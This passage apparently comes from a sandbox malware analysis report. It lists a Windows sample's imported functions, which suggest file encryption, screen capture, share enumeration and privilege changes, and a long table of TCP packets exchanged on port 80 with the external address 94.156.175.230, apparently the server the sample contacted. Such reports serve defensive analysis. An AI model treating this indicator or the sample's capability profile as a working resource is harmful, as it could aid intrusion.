                                                                  KERNEL32.dllExitProcess, SetEndOfFile, SetPriorityClass, GetSystemTime, GetDiskFreeSpaceExW, OpenProcess, GetTempPathW, LocalFree, DeleteFileW, FindFirstFileW, FindClose, GetVolumeNameForVolumeMountPointW, FindNextFileW, SetThreadPriority, GetCurrentThread, GetFileAttributesW, WaitForMultipleObjects, SetEvent, CreateEventA, ReOpenFile, SetLastError, GlobalSize, GlobalLock, GlobalUnlock, GetProcAddress, LoadLibraryA, GetCurrentProcessId, DeleteFileA, ResetEvent, HeapAlloc, GetProcessHeap, GetFileSize, lstrcmpiA, GlobalMemoryStatusEx, IsWow64Process, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, FindFirstFileExW, GetConsoleWindow, SetFilePointerEx, DeviceIoControl, CreateFileA, GetDriveTypeA, GetSystemWindowsDirectoryW, GetLogicalDrives, GetLastError, MoveFileW, SetFileAttributesW, CreateDirectoryW, ReadFile, GetFileSizeEx, Wow64RevertWow64FsRedirection, CreateProcessW, Wow64DisableWow64FsRedirection, CloseHandle, FlushFileBuffers, WriteFile, CreateFileW, OutputDebugStringW, WaitForSingleObject, CreateThread, GetModuleFileNameW, Sleep, SetStdHandle, ReadConsoleW, GetConsoleMode, GetConsoleCP, HeapQueryInformation, HeapSize, HeapReAlloc, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, GetCommandLineW, GetCommandLineA, HeapFree, GetCurrentProcess, GetStdHandle, GetFileType, FreeLibraryAndExitThread, ExitThread, WriteConsoleW, GetModuleHandleExW, LoadLibraryExW, FreeLibrary, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, QueryPerformanceCounter, InitializeSRWLock, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, InitializeCriticalSectionEx, TryEnterCriticalSection, GetCurrentThreadId, WaitForSingleObjectEx, GetExitCodeThread, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, GetSystemTimeAsFileTime, GetModuleHandleW, EncodePointer, DecodePointer, LCMapStringEx, CompareStringEx, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, CreateEventW, IsDebuggerPresent, GetStartupInfoW, InitializeSListHead, RtlUnwind, RaiseException
                                                                  USER32.dllwsprintfA, GetDC, GetSystemMetrics, ShowWindow, ReleaseDC
                                                                  GDI32.dllCreateCompatibleDC, CreateCompatibleBitmap, DeleteObject, DeleteDC, BitBlt, SelectObject
                                                                  ADVAPI32.dllRegCloseKey, RegisterServiceCtrlHandlerW, RegQueryValueExA, RegOpenKeyExA, RegQueryValueExW, RegOpenKeyExW, AdjustTokenPrivileges, LookupPrivilegeValueW, SetEntriesInAclW, SetNamedSecurityInfoW, GetTokenInformation, ConvertSidToStringSidA, OpenProcessToken, SetServiceStatus, RegSetValueExA, RegCreateKeyExA, StartServiceCtrlDispatcherW
                                                                  ole32.dllGetHGlobalFromStream, CLSIDFromString, CreateStreamOnHGlobal
                                                                  PSAPI.DLLGetModuleFileNameExW, GetModuleFileNameExA, EnumProcesses
                                                                  WS2_32.dllselect, ioctlsocket, WSAStartup, closesocket, recv, send, setsockopt, connect, htons, inet_addr, socket
                                                                  IPHLPAPI.DLLGetAdaptersInfo
                                                                  NETAPI32.dllNetApiBufferFree, NetShareEnum
                                                                  gdiplus.dllGdiplusStartup, GdipCreateBitmapFromHBITMAP, GdipFree, GdipSaveImageToStream, GdipBitmapGetPixel, GdipGetImageHeight, GdipDisposeImage, GdipAlloc, GdipCloneImage, GdipGetImageWidth
                                                                  RstrtMgr.DLLRmRegisterResources, RmGetList, RmEndSession, RmStartSession

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States

                                                                  Network Behavior

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  May 28, 2021 13:00:03.475676060 CEST4971880192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:03.541131973 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.541234970 CEST4971880192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:03.605664015 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.605779886 CEST4971880192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:03.670078039 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.670099020 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.670108080 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.670115948 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.670171022 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.670228004 CEST4971880192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:03.670273066 CEST4971880192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:03.734785080 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.734921932 CEST4971880192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:03.735080957 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.735102892 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.735140085 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.735160112 CEST4971880192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:03.735161066 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.735182047 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.735198021 CEST4971880192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:03.735202074 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.735208035 CEST4971880192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:03.735219955 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.735223055 CEST4971880192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:03.735239029 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.735256910 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.735265017 CEST4971880192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:03.735280037 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.735285044 CEST4971880192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:03.735311985 CEST4971880192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:03.735337973 CEST4971880192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:03.799241066 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.799304008 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.799444914 CEST4971880192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:03.799474955 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.799493074 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.799565077 CEST4971880192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:03.799670935 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.799700975 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.799784899 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.799797058 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.799873114 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.799946070 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.800040960 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.800100088 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.800138950 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.800220966 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.800262928 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.800339937 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.800380945 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.800447941 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.800508022 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.800546885 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.864166975 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.864183903 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.864197016 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.864207983 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.864506006 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.864521027 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:03.864583015 CEST4971880192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:03.864748001 CEST4971880192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:03.929028988 CEST804971894.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.127388954 CEST4971980192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:04.191392899 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.191566944 CEST4971980192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:04.255750895 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.257359982 CEST4971980192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:04.323328972 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.323380947 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.323411942 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.323436975 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.323532104 CEST4971980192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:04.323615074 CEST4971980192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:04.323995113 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.324035883 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.324065924 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.324071884 CEST4971980192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:04.324101925 CEST4971980192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:04.324126959 CEST4971980192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:04.387732029 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.388032913 CEST4971980192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:04.388247013 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.388278961 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.388303995 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.388329983 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.388354063 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.388381958 CEST4971980192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:04.388385057 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.388415098 CEST4971980192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:04.388431072 CEST4971980192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:04.388442993 CEST4971980192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:04.388454914 CEST4971980192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:04.388509989 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.388592958 CEST4971980192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:04.388628960 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.388655901 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.388680935 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.388731003 CEST4971980192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:04.388747931 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.388758898 CEST4971980192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:04.388830900 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.388859034 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.388885021 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.388910055 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.388915062 CEST4971980192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:04.388937950 CEST4971980192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:04.388963938 CEST4971980192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:04.388992071 CEST4971980192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:04.452685118 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.452729940 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.452754974 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.452872038 CEST4971980192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:04.452936888 CEST4971980192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:04.452949047 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.453067064 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.453094006 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.453211069 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.453283072 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.453311920 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.453439951 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.453468084 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.453538895 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.453649998 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.453762054 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.453824997 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.453984976 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.454271078 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.454467058 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.454540014 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.454627037 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.517132998 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.517179012 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.517210960 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.517239094 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.517340899 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.517371893 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.517493963 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.517518044 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.517544031 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.517647028 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.517985106 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.518016100 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.518132925 CEST4971980192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:04.524817944 CEST4971980192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:04.589047909 CEST804971994.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.931821108 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:04.995693922 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:04.995825052 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.059971094 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.060110092 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.124356031 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.124398947 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.124428988 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.124454975 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.124461889 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.124538898 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.124558926 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.124571085 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.125215054 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.125252008 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.125287056 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.125329971 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.189404964 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.189440966 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.189469099 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.189567089 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.189616919 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.189630985 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.189694881 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.189743996 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.189764977 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.189809084 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.190388918 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.190465927 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.190820932 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.190897942 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.190908909 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.191011906 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.191077948 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.191106081 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.191145897 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.191179991 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.191181898 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.191262960 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.191523075 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.191550016 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.191575050 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.191584110 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.191603899 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.191623926 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.191632986 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.191651106 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.191679955 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.191709042 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.230098963 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.230206013 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.255834103 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.255867004 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.255940914 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.255949020 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.256006956 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.256236076 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.256261110 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.256385088 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.256454945 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.256525993 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.256551027 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.256606102 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.256660938 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.256778955 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.256881952 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.257016897 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.257095098 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.257121086 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.257154942 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.257256985 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.257416964 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.257479906 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.294431925 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.321703911 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.321734905 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.321760893 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.321789026 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.321815968 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.321851969 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.322043896 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.322072983 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.322132111 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.322154999 CEST4976080192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.386183977 CEST804976094.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.520692110 CEST4995280192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.585776091 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.585926056 CEST4995280192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.649890900 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.650676012 CEST4995280192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.714852095 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.714884043 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.714910030 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.714935064 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.714939117 CEST4995280192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.714961052 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.714968920 CEST4995280192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.714982033 CEST4995280192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.715004921 CEST4995280192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.715059996 CEST4995280192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.715089083 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.715162992 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.715204000 CEST4995280192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.715213060 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.715254068 CEST4995280192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.715279102 CEST4995280192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.780992985 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.781035900 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.781160116 CEST4995280192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.781189919 CEST4995280192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.781414032 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.781443119 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.781469107 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.781497955 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.781505108 CEST4995280192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.781526089 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.781543016 CEST4995280192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.781563044 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.781594992 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.781594992 CEST4995280192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.781622887 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.781650066 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.781653881 CEST4995280192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.781685114 CEST4995280192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.781732082 CEST4995280192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.782094955 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.782167912 CEST4995280192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.782219887 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.782247066 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.782274008 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.782296896 CEST4995280192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.782334089 CEST4995280192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.782366037 CEST4995280192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.821825981 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.825494051 CEST4995280192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.845530987 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.845557928 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.845695019 CEST4995280192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.845921040 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.845957041 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.845987082 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.846055984 CEST4995280192.168.2.394.156.175.230
                                                                  May 28, 2021 13:00:05.846180916 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.846257925 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.846375942 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.846402884 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.846467018 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.846633911 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.846663952 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.846724987 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.846852064 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.846877098 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.847067118 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.847136974 CEST804995294.156.175.230192.168.2.3
                                                                  May 28, 2021 13:00:05.890701056 CEST804995294.156.175.230192.168.2.3
